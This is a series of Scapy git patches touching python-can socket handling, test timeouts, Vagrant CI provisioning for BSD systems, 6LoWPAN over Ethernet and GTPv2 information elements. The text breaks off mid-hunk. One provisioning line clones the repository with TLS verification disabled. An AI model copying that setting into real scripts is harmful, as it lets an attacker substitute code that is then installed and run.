from scapy.modules.six.moves import queue from can import Message as can_Message from can import CanError as can_CanError @@ -35,8 +35,8 @@ class SocketMapper: def __init__(self, bus, sockets): - self.bus = bus - self.sockets = sockets + self.bus = bus # type: can_BusABC + self.sockets = sockets # type: list[SocketWrapper] def mux(self): while True: @@ -44,11 +44,11 @@ def mux(self): msg = self.bus.recv(timeout=0) if msg is None: return - except Exception: - return - for sock in self.sockets: - if sock._matches_filters(msg): - sock.rx_queue.put(copy.copy(msg)) + for sock in self.sockets: + if sock._matches_filters(msg): + sock.rx_queue.put(copy.copy(msg)) + except Exception as e: + warning("[MUX] python-can exception caught: %s" % e) class SocketsPool(object): @@ -64,19 +64,21 @@ def __new__(cls): def internal_send(self, sender, msg): with self.pool_mutex: try: - t = self.pool[sender.name] + mapper = self.pool[sender.name] + mapper.bus.send(msg) + for sock in mapper.sockets: + if sock == sender: + continue + if not sock._matches_filters(msg): + continue + + m = copy.copy(msg) + m.timestamp = time.time() + sock.rx_queue.put(m) except KeyError: - return - - try: - t.bus.send(msg) - for sock in t.sockets: - if sock != sender and sock._matches_filters(msg): - m = copy.copy(msg) - m.timestamp = time.time() - sock.rx_queue.put(m) - except can_CanError: - pass + warning("[SND] Socket %s not found in pool" % sender.name) + except can_CanError as e: + warning("[SND] python-can exception caught: %s" % e) def multiplex_rx_packets(self): with self.pool_mutex: @@ -104,11 +106,14 @@ def register(self, socket, *args, **kwargs): def unregister(self, socket): with self.pool_mutex: - t = self.pool[socket.name] - t.sockets.remove(socket) - if not t.sockets: - t.bus.shutdown() - del self.pool[socket.name] + try: + t = self.pool[socket.name] + t.sockets.remove(socket) + if not t.sockets: + t.bus.shutdown() + del self.pool[socket.name] + except KeyError: + warning("Socket %s already removed from pool" % socket.name) class SocketWrapper(can_BusABC): @@ -135,7 +140,7 @@ def shutdown(self): SocketsPool().unregister(self) -class PythonCANSocket(SuperSocket, SelectableObject): +class PythonCANSocket(SuperSocket): desc = "read/write packets at a given CAN interface " \ "using a python-can bus object" nonblocking_socket = True diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 919d1c4887c..264bafedfd8 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -196,7 +196,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base thread.join(timeout=5) = Positive, hold response pending for several messages -tout = 0.3 +tout = 0.8 repeats = 4 started = threading.Event() def ecusim(): @@ -215,9 +215,13 @@ started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: starttime = time.time() # may be inaccurate -> on some systems only seconds precision - assert GMLAN_RequestDownload(isotpsock, 4, timeout=repeats*tout+0.5) == True + result = GMLAN_RequestDownload(isotpsock, 4, timeout=repeats*tout+0.5) + print(result) + assert result endtime = time.time() - assert (endtime - starttime) >= tout*repeats + print(endtime - starttime) + print(tout * (repeats - 1)) + assert (endtime - starttime) >= tout * (repeats - 1) thread.join(timeout=5) diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index cb3a0e0ce5d..880b5d59fe9 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -1175,7 +1175,8 @@ candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA vcan0 541 [5] 21 AA AA AA AA''') with ISOTPSocket(CandumpReader(candump_fd), sid=0x241, did=0x541, listen_only=True) as s: - pkts = s.sniff(timeout=1, count=6) + pkts = s.sniff(timeout=2, count=6) + print(len(pkts)) assert(len(pkts) == 6) isotp = pkts[0] print(repr(isotp)) diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index dcc9bc84bf2..d7be7fc06cc 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -639,10 +639,15 @@ def test_isotpscan_none_random_ids(sniff_time=0.02): print(ids) semaphore = threading.Semaphore(0) def isotpserver(i): - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x100 + i, did=i) as s: - s.sniff(timeout=700 * sniff_time, count=1, - started_callback=semaphore.release) + try: + with new_can_socket0() as isocan, \ + ISOTPSocket(isocan, sid=0x100 + i, did=i) as s: + s.sniff(timeout=1400 * sniff_time, count=1, + started_callback=semaphore.release) + warning("ISOTPServer 0x%x finished" % i) + except Exception as e: + warning("ERROR in isotpserver 0x%x" % i) + warning(e) pkt = CAN(identifier=0x701, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08') thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) threads = [threading.Thread(target=isotpserver, args=(x,)) for x in ids] @@ -690,10 +695,13 @@ def test_isotpscan_none_random_ids_padding(sniff_time=0.02): ids = set(rnd._fix() for _ in range(10)) semaphore = threading.Semaphore(0) def isotpserver(i): - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x100 + i, did=i, padding=True) as s: - s.sniff(timeout=700 * sniff_time, count=1, - started_callback=semaphore.release) + try: + with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x100 + i, did=i, padding=True) as s: + s.sniff(timeout=1400 * sniff_time, count=1, started_callback=semaphore.release) + warning("ISOTPServer 0x%x finished" % i) + except Exception as e: + warning("ERROR in isotpserver 0x%x" % i) + warning(e) pkt = CAN(identifier=0x701, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08') thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) From 42ad7075267717198f6e55508b2bdc3c6ca2dae3 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 24 Jun 2020 20:31:00 +0200 Subject: [PATCH 0217/1632] Remove unnecessary changes --- test/contrib/automotive/gm/gmlanutils.uts | 3 --- test/contrib/isotp.uts | 1 - 2 files changed, 4 deletions(-) diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 264bafedfd8..c148986c444 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -216,11 +216,8 @@ started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: starttime = time.time() # may be inaccurate -> on some systems only seconds precision result = GMLAN_RequestDownload(isotpsock, 4, timeout=repeats*tout+0.5) - print(result) assert result endtime = time.time() - print(endtime - starttime) - print(tout * (repeats - 1)) assert (endtime - starttime) >= tout * (repeats - 1) thread.join(timeout=5) diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index 880b5d59fe9..f4f6a738b96 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -1176,7 +1176,6 @@ candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA with ISOTPSocket(CandumpReader(candump_fd), sid=0x241, did=0x541, listen_only=True) as s: pkts = s.sniff(timeout=2, count=6) - print(len(pkts)) assert(len(pkts) == 6) isotp = pkts[0] print(repr(isotp)) From bae1df3810d84d87bb180892fe7912cbe2a02025 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 15 Jul 2020 17:54:22 +0000 Subject: [PATCH 0218/1632] avoid mutating globals --- scapy/config.py | 15 +++++++++------ test/regression.uts | 9 +++++++++ 2 files changed, 18 insertions(+), 6 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index 73aad9a3c34..e5820ec75aa 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -479,8 +479,9 @@ def _set_conf_sockets(): conf.L3socket6 = functools.partial(L3pcapSocket, filter="ip6") conf.L2socket = L2pcapSocket conf.L2listen = L2pcapListenSocket - # Update globals - _load("scapy.arch.pcapdnet") + if conf.interactive: + # Update globals + _load("scapy.arch.pcapdnet") return if conf.use_bpf: from scapy.arch.bpf.supersocket import L2bpfListenSocket, \ @@ -489,8 +490,9 @@ def _set_conf_sockets(): conf.L3socket6 = functools.partial(L3bpfSocket, filter="ip6") conf.L2socket = L2bpfSocket conf.L2listen = L2bpfListenSocket - # Update globals - _load("scapy.arch.bpf") + if conf.interactive: + # Update globals + _load("scapy.arch.bpf") return if LINUX: from scapy.arch.linux import L3PacketSocket, L2Socket, L2ListenSocket @@ -498,8 +500,9 @@ def _set_conf_sockets(): conf.L3socket6 = functools.partial(L3PacketSocket, filter="ip6") conf.L2socket = L2Socket conf.L2listen = L2ListenSocket - # Update globals - _load("scapy.arch.linux") + if conf.interactive: + # Update globals + _load("scapy.arch.linux") return if WINDOWS: from scapy.arch.windows import _NotAvailableSocket diff --git a/test/regression.uts b/test/regression.uts index 9fbb6fc0bdf..9541b08269f 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -127,6 +127,15 @@ except: assert not conf.use_bpf +if not conf.use_pcap: + a = six.moves.builtins.__dict__ + conf.interactive = True + conf.use_pcap = True + assert a["get_if_list"] == scapy.arch.pcapdnet.get_if_list + conf.use_pcap = False + assert a["get_if_list"] == scapy.arch.linux.get_if_list + conf.interactive = False + = Configuration conf.use_* WINDOWS ~ windows From 6628a031e2efb49fc2744db7be21f8abf2a37521 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 15 Jul 2020 20:06:16 +0200 Subject: [PATCH 0219/1632] Update to NetBSD 9.0 --- doc/vagrant_ci/Vagrantfile | 2 +- doc/vagrant_ci/provision_netbsd.sh | 6 ++++-- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/doc/vagrant_ci/Vagrantfile b/doc/vagrant_ci/Vagrantfile index 5c5de0e5bab..5fd0c7efa55 100644 --- a/doc/vagrant_ci/Vagrantfile +++ b/doc/vagrant_ci/Vagrantfile @@ -19,7 +19,7 @@ Vagrant.configure("2") do |config| end config.vm.define "netbsd" do |bsd| - bsd.vm.box = "generic/netbsd8" + bsd.vm.box = "generic/netbsd9" bsd.vm.provision "shell", path: "provision_netbsd.sh" end diff --git a/doc/vagrant_ci/provision_netbsd.sh b/doc/vagrant_ci/provision_netbsd.sh index 69b213126ae..11d2cec7c54 100644 --- a/doc/vagrant_ci/provision_netbsd.sh +++ b/doc/vagrant_ci/provision_netbsd.sh @@ -5,12 +5,14 @@ # Copyright (C) Philippe Biondi # This program is published under a GPLv2 license +RELEASE="9.0_2020Q1" + sudo -s unset PROMPT_COMMAND export PATH="/sbin:/usr/pkg/sbin:/usr/pkg/bin:$PATH" -export PKG_PATH="http://ftp.netbsd.org/pub/pkgsrc/packages/NetBSD/amd64/8.0_2018Q4/All/" +export PKG_PATH="http://ftp.netbsd.org/pub/pkgsrc/packages/NetBSD/amd64/${RELEASE}/All/" pkg_delete curl -pkg_add git python27 python36 py27-virtualenv py36-expat +pkg_add git python27 python38 py27-virtualenv py27-sqlite3 py38-expat git -c http.sslVerify=false clone https://github.com/secdev/scapy cd scapy virtualenv-2.7 venv From 680c7032cd0ac3ea1194656dace8951dc02131bf Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 16 Jul 2020 13:35:56 +0200 Subject: [PATCH 0220/1632] Update to FreeBSD 12.1 --- doc/vagrant_ci/Vagrantfile | 2 +- doc/vagrant_ci/provision_freebsd.sh | 6 ++++-- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/doc/vagrant_ci/Vagrantfile b/doc/vagrant_ci/Vagrantfile index 5fd0c7efa55..13d27407e05 100644 --- a/doc/vagrant_ci/Vagrantfile +++ b/doc/vagrant_ci/Vagrantfile @@ -14,7 +14,7 @@ Vagrant.configure("2") do |config| end config.vm.define "freebsd" do |bsd| - bsd.vm.box = "freebsd/FreeBSD-11.3-RELEASE" + bsd.vm.box = "freebsd/FreeBSD-12.1-STABLE" bsd.vm.provision "shell", path: "provision_freebsd.sh" end diff --git a/doc/vagrant_ci/provision_freebsd.sh b/doc/vagrant_ci/provision_freebsd.sh index 1471ac8d313..8d0faf37490 100644 --- a/doc/vagrant_ci/provision_freebsd.sh +++ b/doc/vagrant_ci/provision_freebsd.sh @@ -1,11 +1,12 @@ -#!/bin/bash +#!/usr/local/bin/bash # This file is part of Scapy # See http://www.secdev.org/projects/scapy for more information # Copyright (C) Philippe Biondi # This program is published under a GPLv2 license -sudo pkg install --yes git python2 python3 py27-virtualenv bash +pkg install --yes git python2 python3 py27-virtualenv py27-sqlite3 py37-sqlite3 bash +su - vagrant bash git clone https://github.com/secdev/scapy cd scapy @@ -13,3 +14,4 @@ export PATH=/usr/local/bin/:$PATH virtualenv-2.7 -p python2.7 venv source venv/bin/activate pip install tox +sudo chown -R vagrant:vagrant /home/vagrant/scapy From 198957efbc80f25c6d0cbe05bc1b033662a606a0 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 16 Jul 2020 14:36:50 +0200 Subject: [PATCH 0221/1632] Update to OpenBSD 6.7 --- doc/vagrant_ci/provision_openbsd.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/vagrant_ci/provision_openbsd.sh b/doc/vagrant_ci/provision_openbsd.sh index dad61e40f49..39984148624 100644 --- a/doc/vagrant_ci/provision_openbsd.sh +++ b/doc/vagrant_ci/provision_openbsd.sh @@ -5,7 +5,7 @@ # Copyright (C) Philippe Biondi # This program is published under a GPLv2 license -sudo pkg_add git python-2.7.15p0 python-3.6.6p1 py-virtualenv +sudo pkg_add git python-2.7.18p0 python-3.8.2 py-virtualenv sudo mkdir -p /usr/local/test/ sudo chown -R vagrant:vagrant /usr/local/test/ cd /usr/local/test/ From 886b7c418ed590958f0623b70bb4e8a1af8971a8 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 16 Jul 2020 14:13:08 +0000 Subject: [PATCH 0222/1632] Add support for RFC7973 --- scapy/layers/sixlowpan.py | 60 ++++++++++++++++++++++++++------------- test/dot15d4.uts | 9 ++++++ 2 files changed, 50 insertions(+), 19 deletions(-) diff --git a/scapy/layers/sixlowpan.py b/scapy/layers/sixlowpan.py index a758f7d166b..a3d24b3b7a2 100644 --- a/scapy/layers/sixlowpan.py +++ b/scapy/layers/sixlowpan.py @@ -54,6 +54,7 @@ import struct from scapy.compat import chb, orb, raw +from scapy.data import ETHER_TYPES from scapy.packet import Packet, bind_layers from scapy.fields import BitField, ByteField, BitEnumField, BitFieldLenField, \ @@ -62,8 +63,9 @@ from scapy.layers.dot15d4 import Dot15d4Data from scapy.layers.inet6 import IPv6, IP6Field from scapy.layers.inet import UDP +from scapy.layers.l2 import Ether -from scapy.utils import lhex +from scapy.utils import lhex, mac2str from scapy.config import conf from scapy.error import warning @@ -71,6 +73,8 @@ from scapy.pton_ntop import inet_pton, inet_ntop from scapy.volatile import RandShort +ETHER_TYPES[0xA0ED] = "6LoWPAN" + LINK_LOCAL_PREFIX = b"\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" # noqa: E501 @@ -348,38 +352,52 @@ def _tf_last_attempt(pkt): return 0, 0, 0, 0 -def _extract_dot15d4address(pkt, source=True): +def _extract_upperaddress(pkt, source=True): """This function extracts the source/destination address of a 6LoWPAN - from its upper Dot15d4Data (802.15.4 data) layer. + from its upper layer. + + (Upper layer could be 802.15.4 data, Ethernet...) params: - source: if True, the address is the source one. Otherwise, it is the destination. returns: the packed & processed address """ + # https://tools.ietf.org/html/rfc6282#section-3.2.2 + SUPPORTED_LAYERS = (Ether, Dot15d4Data) underlayer = pkt.underlayer - while underlayer is not None and not isinstance(underlayer, Dot15d4Data): # noqa: E501 + while underlayer and not isinstance(underlayer, SUPPORTED_LAYERS): underlayer = underlayer.underlayer - if type(underlayer) == Dot15d4Data: + # Extract and process address + if type(underlayer) == Ether: + addr = mac2str(underlayer.src if source else underlayer.dst) + # https://tools.ietf.org/html/rfc2464#section-4 + return LINK_LOCAL_PREFIX[:8] + addr[:3] + b"\xff\xfe" + addr[3:] + elif type(underlayer) == Dot15d4Data: addr = underlayer.src_addr if source else underlayer.dest_addr - if underlayer.underlayer.fcf_destaddrmode == 3: - tmp_ip = LINK_LOCAL_PREFIX[0:8] + struct.pack(">Q", addr) # noqa: E501 + addr = struct.pack(">Q", addr) + if underlayer.underlayer.fcf_destaddrmode == 3: # Extended/long + tmp_ip = LINK_LOCAL_PREFIX[0:8] + addr # Turn off the bit 7. - tmp_ip = tmp_ip[0:8] + struct.pack("B", (orb(tmp_ip[8]) ^ 0x2)) + tmp_ip[9:16] # noqa: E501 - elif underlayer.underlayer.fcf_destaddrmode == 2: - tmp_ip = LINK_LOCAL_PREFIX[0:8] + \ - b"\x00\x00\x00\xff\xfe\x00" + \ - struct.pack(">Q", addr)[6:] - return tmp_ip + return tmp_ip[0:8] + struct.pack("B", (orb(tmp_ip[8]) ^ 0x2)) + tmp_ip[9:16] # noqa: E501 + elif underlayer.underlayer.fcf_destaddrmode == 2: # Short + return ( + LINK_LOCAL_PREFIX[0:8] + + b"\x00\x00\x00\xff\xfe\x00" + + addr[6:] + ) else: - # Most of the times, it's necessary the IEEE 802.15.4 data to extract this address # noqa: E501 - raise Exception('Unimplemented: IP Header is contained into IEEE 802.15.4 frame, in this case it\'s not available.') # noqa: E501 + # Most of the times, it's necessary the IEEE 802.15.4 data to extract + # this address, sometimes another layer. + raise Exception( + 'Unimplemented: Unsupported upper layer: %s' % type(underlayer) + ) class LoWPAN_IPHC(Packet): """6LoWPAN IPv6 header compressed packets - It follows the implementation of draft-ietf-6lowpan-hc-15. + It follows the implementation of RFC6282 """ # the LOWPAN_IPHC encoding utilizes 13 bits, 5 dispatch type name = "LoWPAN IP Header Compression Packet" @@ -523,13 +541,13 @@ def decompressDestinyAddr(self, packet): elif self.dam == 3: # TODO May need some extra changes, we are copying # (self.m == 0 and self.dac == 1) - tmp_ip = _extract_dot15d4address(self, source=False) + tmp_ip = _extract_upperaddress(self, source=False) elif self.m == 0 and self.dac == 1: if self.dam == 0: raise Exception('Reserved') elif self.dam == 0x3: - tmp_ip = _extract_dot15d4address(self, source=False) + tmp_ip = _extract_upperaddress(self, source=False) elif self.dam not in [0x1, 0x2]: warning("Unknown destiny address compression mode !") elif self.m == 1 and self.dac == 0: @@ -545,6 +563,7 @@ def decompressDestinyAddr(self, packet): tmp_ip = b"\xff\x02" + b"\x00" * 13 + tmp_ip[-1:] elif self.m == 1 and self.dac == 1: if self.dam == 0x0: + # See https://tools.ietf.org/html/rfc6282#page-9 raise Exception("Unimplemented: I didn't understand the 6lowpan specification") # noqa: E501 else: # all the others values raise Exception("Reserved value by specification.") @@ -617,7 +636,7 @@ def decompressSourceAddr(self, packet): tmp = LINK_LOCAL_PREFIX[0:8] + b"\x00\x00\x00\xff\xfe\x00" tmp_ip = tmp + tmp_ip[16 - source_addr_mode2(self):16] elif self.sam == 0x3: # EXTRACT ADDRESS FROM Dot15d4 - tmp_ip = _extract_dot15d4address(self, source=True) + tmp_ip = _extract_upperaddress(self, source=True) else: warning("Unknown source address compression mode !") else: # self.sac == 1: @@ -792,6 +811,9 @@ def sixlowpan_defragment(packet_list): bind_layers(SixLoWPAN, LoWPAN_IPHC,) bind_layers(LoWPANMesh, LoWPANFragmentationFirst,) bind_layers(LoWPANMesh, LoWPANFragmentationSubsequent,) + +bind_layers(Ether, SixLoWPAN, type=0xA0ED) + # TODO: I have several doubts about the Broadcast LoWPAN # bind_layers( LoWPANBroadcast, LoWPANHC1CompressedIPv6, ) # bind_layers( SixLoWPAN, LoWPANBroadcast, ) diff --git a/test/dot15d4.uts b/test/dot15d4.uts index e79e599087f..6f0e6c8a23f 100644 --- a/test/dot15d4.uts +++ b/test/dot15d4.uts @@ -382,6 +382,15 @@ packet = SixLoWPAN(raw(packet)) assert packet.sourceAddr == "aaaa::1" assert packet.destinyAddr == "ff02::1a" += SixLoWPAN over Ethernet +# See https://github.com/secdev/scapy/issues/2716 +packet = Ether(b'\xff\xff\xff\xff\xff\xffPQRg\x15i\xa0\xed~;\x02\xf0\x1f\x90\x1f\x90\x03Qtesttext2') +assert LoWPAN_IPHC in packet +assert packet[LoWPAN_IPHC].src == "fe80::5051:52ff:fe67:1569" +assert packet[LoWPAN_IPHC].dst == "ff02::2" +assert packet[UDP].dport == packet[UDP].sport == 8080 + + + Dot15d4 with SixLoWPAN - Advanced dissection = Compressed SixLoWPAN - real packets with ZEP2 From 55c7216aff8e0180cb40b73e14757cebc3f2cdf1 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Sat, 18 Jul 2020 17:08:42 -0400 Subject: [PATCH 0223/1632] GTP changes w.r.t 3gpp Rel16 (#2696) * GTP changes w.r.t 3gpp Rel16 * Cleanup length computation of GTPv2 Co-authored-by: gpotter2 --- scapy/contrib/gtp.py | 16 +- scapy/contrib/gtp_v2.py | 375 +++++++++++++++++++++++----------------- scapy/fields.py | 3 + test/contrib/gtp.uts | 5 + test/contrib/gtp_v2.uts | 37 +++- 5 files changed, 276 insertions(+), 160 deletions(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 7de78567074..d7415915fff 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -14,6 +14,7 @@ from scapy.compat import chb, orb, bytes_encode +from scapy.config import conf from scapy.error import warning from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ ConditionalField, FieldLenField, FieldListField, FlagsField, IntField, \ @@ -311,6 +312,11 @@ class GTPPDUSessionContainer(Packet): lambda pkt: pkt.P == 1), ConditionalField(ByteField("pad3", 0), lambda pkt: pkt.P == 1), + ConditionalField(StrLenField( + "extraPadding", + "", + length_from=lambda pkt: 4 * (pkt.ExtHdrLen) - 4), + lambda pkt: pkt.ExtHdrLen and pkt.ExtHdrLen > 1), ByteEnumField("NextExtHdr", 0, ExtensionHeadersTypes), ] def guess_payload_class(self, payload): @@ -347,10 +353,18 @@ def hashret(self): class IE_Base(Packet): - def extract_padding(self, pkt): return "", pkt + def post_build(self, p, pay): + if self.fields_desc[1].name == "length": + if self.length is None: + tmp_len = len(p) + if isinstance(self.payload, conf.padding_layer): + tmp_len += len(self.payload.load) + p = p[:1] + struct.pack("!H", tmp_len - 2) + p[3:] + return p + pay + class IE_Cause(IE_Base): name = "Cause" diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index ce221aa4054..cecb72da108 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -22,11 +22,27 @@ from scapy.compat import orb -from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ - ConditionalField, IntField, IPField, PacketField, FieldLenField, \ - PacketListField, ShortEnumField, ShortField, StrFixedLenField, \ - StrLenField, ThreeBytesField, XBitField, XIntField, XShortField from scapy.data import IANA_ENTERPRISE_NUMBERS +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + ConditionalField, + IPField, + IntField, + PacketField, + PacketListField, + ShortEnumField, + ShortField, + StrFixedLenField, + StrLenField, + ThreeBytesField, + XBitField, + XIntField, + XShortField, +) +from scapy.layers.inet6 import IP6Field from scapy.packet import bind_layers, Packet, Raw from scapy.volatile import RandIP, RandShort @@ -197,7 +213,7 @@ 71: "APN", 72: "AMBR", 73: "EPS Bearer ID", - 74: "IPv4", + 74: "IP Address", 75: "MEI", 76: "MSISDN", 77: "Indication", @@ -214,11 +230,14 @@ 95: "Charging Characteristics", 97: "Bearer Flags", 99: "PDN Type", + 107: "MM Context (EPS Security Context and Quadruplets)", + 109: "PDN Connection", 114: "UE Time zone", 126: "Port Number", 127: "APN Restriction", 128: "Selection Mode", 132: "FQ-CSID", + 136: "FQDN", 145: "UCI", 161: "Max MBR/APN-AMBR (MMBR)", 172: "RAN/NAS Cause", @@ -262,21 +281,30 @@ def answers(self, other): self.payload.answers(other.payload)) -class IE_IPv4(gtp.IE_Base): - name = "IE IPv4" +class IE_IP_Address(gtp.IE_Base): + name = "IE IP Address" fields_desc = [ByteEnumField("ietype", 74, IEType), - FieldLenField("length", None, length_of="address", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), - IPField("address", RandIP())] + ConditionalField( + IPField("address", RandIP()), + lambda pkt: pkt.length == 4), + ConditionalField( + IP6Field("address6", None), + lambda pkt: pkt.length == 16)] + + def post_build(self, p, pay): + if self.length is None: + tmp_len = 16 if self.address6 is not None else 4 + p = p[:1] + struct.pack("!H", tmp_len) + p[2:] + return p + pay class IE_MEI(gtp.IE_Base): name = "IE MEI" fields_desc = [ByteEnumField("ietype", 75, IEType), - FieldLenField("length", None, length_of="MEI", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("MEI", "175675478970685", @@ -300,8 +328,7 @@ def IE_Dispatcher(s): class IE_EPSBearerID(gtp.IE_Base): name = "IE EPS Bearer ID" fields_desc = [ByteEnumField("ietype", 73, IEType), - FieldLenField("length", None, length_of="EBI", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteField("EBI", 0)] @@ -310,8 +337,7 @@ class IE_EPSBearerID(gtp.IE_Base): class IE_RAT(gtp.IE_Base): name = "IE RAT" fields_desc = [ByteEnumField("ietype", 82, IEType), - FieldLenField("length", None, length_of="RAT_type", - adjust=lambda pkt, x: x + 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteEnumField("RAT_type", None, RATType)] @@ -320,9 +346,7 @@ class IE_RAT(gtp.IE_Base): class IE_ServingNetwork(gtp.IE_Base): name = "IE Serving Network" fields_desc = [ByteEnumField("ietype", 83, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("MCC", "", 2), @@ -404,9 +428,7 @@ class IE_ULI(gtp.IE_Base): name = "IE User Location Information" fields_desc = [ ByteEnumField("ietype", 86, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 2), @@ -483,9 +505,7 @@ class IE_ULI(gtp.IE_Base): class IE_UCI(gtp.IE_Base): name = "IE UCI" fields_desc = [ByteEnumField("ietype", 145, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("MCC", "", 2), @@ -501,9 +521,7 @@ class IE_UCI(gtp.IE_Base): class IE_FTEID(gtp.IE_Base): name = "IE F-TEID" fields_desc = [ByteEnumField("ietype", 87, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("ipv4_present", 0, 1), @@ -519,8 +537,7 @@ class IE_FTEID(gtp.IE_Base): class IE_BearerContext(gtp.IE_Base): name = "IE Bearer Context" fields_desc = [ByteEnumField("ietype", 93, IEType), - FieldLenField("length", None, length_of="IE_list", - adjust=lambda pkt, x: x, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), PacketListField("IE_list", None, IE_Dispatcher, @@ -530,9 +547,7 @@ class IE_BearerContext(gtp.IE_Base): class IE_BearerFlags(gtp.IE_Base): name = "IE Bearer Flags" fields_desc = [ByteEnumField("ietype", 97, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 4), @@ -542,12 +557,55 @@ class IE_BearerFlags(gtp.IE_Base): BitField("PPC", 0, 1)] +class IE_MMContext_EPS(gtp.IE_Base): + name = "IE MM Context (EPS Security Context and Quadruplets)" + fields_desc = [ByteEnumField("ietype", 107, IEType), + ShortField("length", None), + BitField("CR_flag", 0, 4), + BitField("instance", 0, 4), + BitField("Sec_Mode", 0, 3), + BitField("Nhi", 0, 1), + BitField("Drxi", 0, 1), + BitField("Ksi", 0, 3), + BitField("Num_quint", 0, 3), + BitField("Num_Quad", 0, 3), + BitField("Uambri", 0, 1), + BitField("Osci", 0, 1), + BitField("Sambri", 0, 1), + BitField("Nas_algo", 0, 3), + BitField("Nas_cipher", 0, 4), + ThreeBytesField("Nas_dl_count", 0), + ThreeBytesField("Nas_ul_count", 0), + BitField("Kasme", 0, 256), + ConditionalField(StrLenField("fields", "", + length_from=lambda x: x.length - 41), + lambda pkt: pkt.length > 40)] + + +class IE_PDNConnection(gtp.IE_Base): + name = "IE PDN Connection" + fields_desc = [ByteEnumField("ietype", 109, IEType), + ShortField("length", None), + BitField("CR_flag", 0, 4), + BitField("instance", 0, 4), + PacketListField("IE_list", None, IE_Dispatcher, + length_from=lambda pkt: pkt.length)] + + +class IE_FQDN(gtp.IE_Base): + name = "IE FQDN" + fields_desc = [ByteEnumField("ietype", 136, IEType), + ShortField("length", None), + BitField("CR_flag", 0, 4), + BitField("instance", 0, 4), + ByteField("fqdn_tr_bit", 0), + StrLenField("fqdn", "", length_from=lambda x: x.length - 1)] + + class IE_NotImplementedTLV(gtp.IE_Base): name = "IE not implemented" fields_desc = [ByteEnumField("ietype", 0, IEType), - FieldLenField("length", None, length_of="length", - adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + ShortField("length", None), BitField("CR_flag", 0, 4), 